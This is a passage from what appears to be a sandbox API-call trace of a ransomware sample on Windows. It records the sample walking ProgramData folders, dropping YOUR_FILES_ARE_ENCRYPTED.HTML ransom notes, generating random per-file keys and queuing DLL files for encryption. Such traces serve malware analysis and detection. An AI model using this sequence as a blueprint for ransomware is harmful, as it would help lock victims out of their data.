lpOverlapped=0x0) returned 1 [0156.807] CloseHandle (hObject=0x58c) returned 1 [0156.808] GetProcessHeap () returned 0x270000 [0156.809] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.809] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Server", cAlternateFileName="")) returned 0 [0156.809] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.809] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0156.809] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\drm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.809] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.811] CloseHandle (hObject=0x4a8) returned 1 [0156.811] GetProcessHeap () returned 0x270000 [0156.812] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.812] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, 
ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="eHome", cAlternateFileName="")) returned 1 [0156.812] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome") returned 34 [0156.812] GetProcessHeap () returned 0x270000 [0156.812] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.812] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\eHome" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome" [0156.812] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*" [0156.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.813] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.813] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 1 [0156.813] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs") returned 39 [0156.813] GetProcessHeap () returned 0x270000 [0156.813] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.813] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs" [0156.813] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*" [0156.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.813] FindNextFileW (in: 
hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.813] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.813] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.814] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.814] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\ehome\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.814] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.816] CloseHandle (hObject=0x58c) returned 1 [0156.816] GetProcessHeap () returned 0x270000 [0156.817] HeapFree (in: hHeap=0x270000, 
dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.817] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 0 [0156.817] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.817] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0156.817] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\ehome\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.818] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.819] CloseHandle (hObject=0x4a8) returned 1 [0156.820] GetProcessHeap () returned 0x270000 [0156.821] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.821] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, 
ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0156.821] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned 40 [0156.821] GetProcessHeap () returned 0x270000 [0156.821] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.821] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL" [0156.821] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*" [0156.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.822] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) 
returned 1 [0156.822] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x9fd2229c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlconfig.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0156.822] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0156.822] lstrcmpW (lpString1="ppcrlconfig.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.822] PathFindExtensionW (pszPath="ppcrlconfig.dll") returned=".dll" [0156.822] lstrlenW (lpString=".dll") returned 4 [0156.822] PathFindExtensionW (pszPath="ppcrlconfig.dll") returned=".dll" [0156.822] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0156.822] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0156.823] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=15616) returned 1 [0156.823] GetProcessHeap () returned 0x270000 [0156.823] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73f0050 [0156.829] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="33") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="AE") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: 
param_1="C5") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="34") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="B5") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="F4") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="34") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="E3") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="92") returned 2 [0156.829] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="02") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="E7") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D0") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="0C") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="27") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="A5") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="AC") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="2B") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="59") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="A8") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="D3") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="43") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="A2") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F6") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="88") returned 2 [0156.830] wsprintfW (in: 
param_1=0x4ebdda2, param_2="%02X" | out: param_1="C9") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="0A") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="FB") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="A6") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="46") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="58") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="53") returned 2 [0156.830] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="1D") returned 2 [0156.831] lstrcpyW (in: lpString1=0x7400104, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" [0156.831] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.831] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73f0050, lpOverlapped=0x73f0050) returned 1 [0156.831] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xa02a357c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 1 [0156.831] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned 52 [0156.831] 
lstrcmpW (lpString1="ppcrlui.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.831] PathFindExtensionW (pszPath="ppcrlui.dll") returned=".dll" [0156.831] lstrlenW (lpString=".dll") returned 4 [0156.831] PathFindExtensionW (pszPath="ppcrlui.dll") returned=".dll" [0156.831] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0156.831] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.842] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=254216) returned 1 [0156.843] GetProcessHeap () returned 0x270000 [0156.843] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.859] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="CF") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="02") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="0E") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="CB") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="4D") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="CD") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="0C") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="8A") returned 2 [0156.859] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="FD") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="96") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="04") returned 2 
[0156.860] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="5C") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="ED") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="69") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="DD") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="B5") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="82") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="5B") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="F4") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="72") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="D6") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="C6") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="59") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="6C") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="05") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="A7") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="57") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="5A") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="37") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="9B") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="E5") returned 2 [0156.860] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="6C") returned 2 [0156.861] lstrcpyW (in: lpString1=0x74d20bc, 
lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" [0156.861] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.861] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.861] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0xa02a357c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 0 [0156.861] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.863] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0156.863] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\identitycrl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.884] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.887] CloseHandle (hObject=0x598) returned 1 [0156.887] 
GetProcessHeap () returned 0x270000 [0156.888] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.897] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x263aa572, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x263aa572, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x263aa572, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0156.897] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player") returned 41 [0156.897] GetProcessHeap () returned 0x270000 [0156.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.900] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player" [0156.900] 